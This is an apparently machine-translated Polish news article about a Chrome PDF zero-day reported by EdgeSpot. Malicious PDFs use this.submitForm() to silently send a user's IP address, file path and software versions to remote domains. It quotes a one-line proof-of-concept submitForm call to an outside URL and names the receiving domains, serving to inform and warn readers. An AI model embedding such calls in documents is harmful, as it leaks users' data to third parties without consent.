Usługa wykrywania exploitów EdgeSpot odkrył intrygującą lukę Chrome zero-day wykorzystującą dokumenty PDF. Luka umożliwia atakującym przechwytywanie poufnych danych przy użyciu złośliwych dokumentów PDF otwieranych w Chrome.

Gdy tylko ofiara otworzy odpowiednie pliki PDF w Google Chrome, szkodliwy program zaczyna działać w tle, zbierając dane użytkownika.

Dane są następnie przekazywane do zdalnego serwera, który jest kontrolowany przez hakerów. Być może zastanawiasz się, jakie dane są zasysane przez osoby atakujące, atakują one następujące dane na twoim komputerze:

• adres IP
• Pełna ścieżka do pliku PDF w systemie
• Wersje na system operacyjny i Chrome

Uważaj na pliki PDF chronione przez złośliwe oprogramowanie

Możesz być zaskoczony, że nic się nie dzieje, gdy do otwierania plików PDF używany jest program Adobe Reader. Ponadto żądania HTTP POST służą do przesyłania danych na zdalne serwery bez interwencji użytkownika.

Eksperci zauważyli, że jedna z dwóch domen readnotifycom lub burpcollaboratornet otrzymuje dane.

Możesz wyobrazić sobie intensywność ataku, biorąc pod uwagę fakt, że większość oprogramowania antywirusowego nie jest w stanie wykryć próbek wykrytych przez EdgeSpot.

Eksperci ujawniają, że osoby atakujące używają interfejsu API JavaScript „this.submitForm ()” JavaScript do gromadzenia poufnych informacji użytkowników.

Przetestowaliśmy go z minimalnym PoC, proste wywołanie API takie jak „this.submitForm („ http://google.com/test ”)” sprawi, że Google Chrome wyśle ​​dane osobowe na google.com.

Eksperci faktycznie dowiedzieli się, że ten błąd przeglądarki Chrome był wykorzystywany przez dwa różne zestawy złośliwych plików PDF. Oba zostały rozpowszechnione odpowiednio w październiku 2017 r. I wrześniu 2018 r.

Zebrane dane mogą być w szczególności wykorzystane przez atakujących w celu dostrajania ataków w przyszłości. Raporty sugerują, że pierwsza partia plików została skompilowana przy użyciu usługi śledzenia PDF ReadNotify.

Użytkownicy mogą korzystać z usługi, aby śledzić widoki użytkowników. EdgeSpot nie udostępnił żadnych szczegółów dotyczących charakteru drugiego zestawu plików PDF.

Jak zachować ochronę

Usługa wykrywania luk w zabezpieczeniach EdgeSpot chciała ostrzec użytkowników Chrome o potencjalnych zagrożeniach, ponieważ łata nie zostanie wydana w najbliższej przyszłości.

EdgeSpot poinformował Google o luce w zeszłym roku, a firma obiecała opublikować łatę pod koniec kwietnia. H.

Można jednak rozważyć tymczasowe obejście problemu, wyświetlając lokalnie odebrane dokumenty PDF za pomocą alternatywnej aplikacji do odczytu plików PDF.

Możesz także otworzyć dokumenty PDF w Chrome, odłączając swoje systemy od Internetu. Tymczasem możesz poczekać na aktualizację Chrome 74, która ma zostać wprowadzona 23 kwietnia.